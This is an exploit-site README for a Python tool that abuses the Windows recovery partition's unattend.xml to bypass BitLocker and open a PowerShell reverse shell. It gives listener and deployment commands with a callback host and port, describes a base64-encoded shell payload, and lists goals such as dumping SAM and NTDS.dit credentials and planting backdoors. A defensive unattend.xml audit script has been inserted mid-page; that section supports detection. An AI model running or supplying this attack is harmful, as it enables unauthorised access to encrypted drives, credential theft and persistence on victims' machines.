## https://sploitus.com/exploit?id=F055329D-ACB6-5DF3-B8FD-CECCAF117BCB
# GreatXML Reverse-Shell POC

A self-contained Python proof-of-concept demonstrating a BitLocker bypass that writes attacker-controlled XML files (`unattend.xml` and a modified `ReAgent.xml`) into the Windows RE recovery partition, based on the **GreatXML** research.

This repository is a fork / red-team adaptation of the original disclosure by **Nightmare Eclipse** (Dead eclipse):

- Original write-up: https://deadeclipse666.blogspot.com/2026/06/greatxml-bitlocker-that-seems-to-only.html
- Original repository mirrors:
  - https://git.projectnightcrawler.dev/NightmareEclipse/GreatXML
  - https://github.com/MSNightmare/GreatXML
  - https://git.churchofmalware.org/Nightmare_Eclipse/GreatXML

## Features

- Automatic recovery-partition detection via `diskpart`.
- Dynamic generation of `unattend.xml` for a given `LHOST`/`LPORT`.
- Built-in listener for the attacking machine.
- Built-in PowerShell reverse shell executed inside WinPE/WinRE.
- Activation via Defender Offline Scan (`--scan`) or WinRE reboot (`--reboot`).

## Requirements

- Windows 10/11 target machine.
- Python 3.x.
- Administrator privileges on the target.
- Network reachability between target and attacker.
- A recovery partition on the target.
- More reliable if Windows Defender Offline Scan has previously run on the target.

## Usage

### 1. Start the listener (attacker machine)

```powershell
python greatxml_poc.py --listen --lhost 0.0.0.0 --lport 4444
```

### 2. Deploy on the target (as Administrator)

Trigger via Defender Offline Scan:

```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --scan
```

Or reboot into WinRE:

```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --reboot
```

### 3. Catch the shell

Once triggered, the target connects back to the listener. You will get an interactive PowerShell prompt running in the WinPE/WinRE context.

## Arguments

| Argument | Description |
|----------|-------------|
| `--lhost` | Attacker IP for the reverse shell. |
| `--lport` | Attacker port for the reverse shell (default: `4444`). |
| `--letter` | Force a drive letter for the recovery partition. |
| `--reboot` | Reboot the target into WinRE after deployment. |
| `--scan` | Trigger Defender Offline Scan after deployment. |
| `--listen` | Start the listener on the attacker machine. |

## Examples

Start listener:

```powershell
python greatxml_poc.py --listen --lhost 0.0.0.0 --lport 4444
```

Deploy and activate via Defender Offline Scan:

```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --scan
```

Deploy with a forced recovery-partition letter:

```powershell
python greatxml_poc.py --lhost 192.168.1.100 --lport 4444 --letter R
```

## How it works

1. The script locates the recovery partition and temporarily assigns it a drive letter.
2. `unattend.xml` is written to the root of the recovery partition.
3. A modified `ReAgent.xml` is written to `\Recovery\WindowsRE\`.
4. When WinRE / Defender Offline boots, the Windows PE environment processes `unattend.xml`.
5. During the `windowsPE` pass, `RunSynchronousCommand` writes `X:\rev.cmd` and executes it.
6. `rev.cmd` launches a base64-encoded PowerShell reverse shell.
7. PowerShell connects back to the attacker listener.
8. The attacker receives an interactive PowerShell session with access to the BitLocker-protected volume.
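A defensive counterpart to the steps above, added here and not part of the GreatXML PoC: a small Python audit that parses an `unattend.xml` found on a recovery partition and flags `RunSynchronousCommand` entries in the `windowsPE` pass that hand control to a shell or script file. The sample document, the `SUSPICIOUS` heuristic and the function names are constructed assumptions for this example.

```python
"""Audit an unattend.xml for windowsPE RunSynchronousCommand entries.

Added defensive example; not code from the GreatXML PoC. A stock WinRE image
has no reason to carry an unattend.xml at the recovery-partition root, so any
synchronous command there deserves a look; ones that launch an interpreter or
a .cmd/.bat/.ps1 file are flagged outright.
"""
import re
import xml.etree.ElementTree as ET

NS = {"u": "urn:schemas-microsoft-com:unattend"}
# Heuristic (assumption): interpreters and script extensions worth flagging.
SUSPICIOUS = re.compile(
    r"(powershell|pwsh|cmd(\.exe)?\b|-enc(odedcommand)?\b|\.cmd\b|\.bat\b|\.ps1\b)",
    re.IGNORECASE,
)

# Constructed sample mirroring the layout the write-up describes; the path
# X:\rev.cmd is the one named in the "How it works" steps above.
SAMPLE_UNATTEND = """<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="windowsPE">
    <component name="Microsoft-Windows-Setup"
      xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State">
      <RunSynchronous>
        <RunSynchronousCommand wcm:action="add">
          <Order>1</Order>
          <Path>cmd.exe /c X:\\rev.cmd</Path>
        </RunSynchronousCommand>
      </RunSynchronous>
    </component>
  </settings>
</unattend>
"""


def find_sync_commands(xml_text):
    """Return (pass, order, path) for every RunSynchronousCommand in the file."""
    root = ET.fromstring(xml_text)
    found = []
    for settings in root.findall("u:settings", NS):
        pass_name = settings.get("pass", "")
        for cmd in settings.iter("{urn:schemas-microsoft-com:unattend}RunSynchronousCommand"):
            order = cmd.findtext("u:Order", default="", namespaces=NS)
            path = cmd.findtext("u:Path", default="", namespaces=NS)
            found.append((pass_name, order, path))
    return found


def audit(xml_text):
    """Flag windowsPE-pass commands that invoke an interpreter or script file."""
    return [c for c in find_sync_commands(xml_text)
            if c[0] == "windowsPE" and SUSPICIOUS.search(c[2])]


if __name__ == "__main__":
    for pass_name, order, path in audit(SAMPLE_UNATTEND):
        print(f"[!] pass={pass_name} order={order}: {path}")
```

Point `audit()` at the contents of `<recovery letter>:\unattend.xml` after temporarily assigning the partition a letter; an empty result on a stock image is the expected baseline.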

## Gained access

- Read/write files on the BitLocker-protected drive without a recovery key.
- Dump `SAM`, `SECURITY`, `SYSTEM`, and `NTDS.dit`.
- Extract user data.
- Install persistence or backdoors.

## Limitations

- Physical or administrative access to the target is required.
- Administrator privileges are required.
- More reliable when Windows Defender Offline Scan has previously run.
- WinRE may not bring up the network if required drivers are missing.

## Security notice

This tool is intended for:

- CTF and lab exercises.
- Authorized penetration testing with written permission.
- Security research and defense-hardening activities.

Do not use on systems you do not own or have explicit permission to test.

## License

Use at your own risk. The author is not responsible for unauthorized or illegal use.

## Attribution

Original vulnerability research and PoC files by **Nightmare Eclipse** (Dead eclipse).
This Python reverse-shell fork was created for red-team lab / CTF use.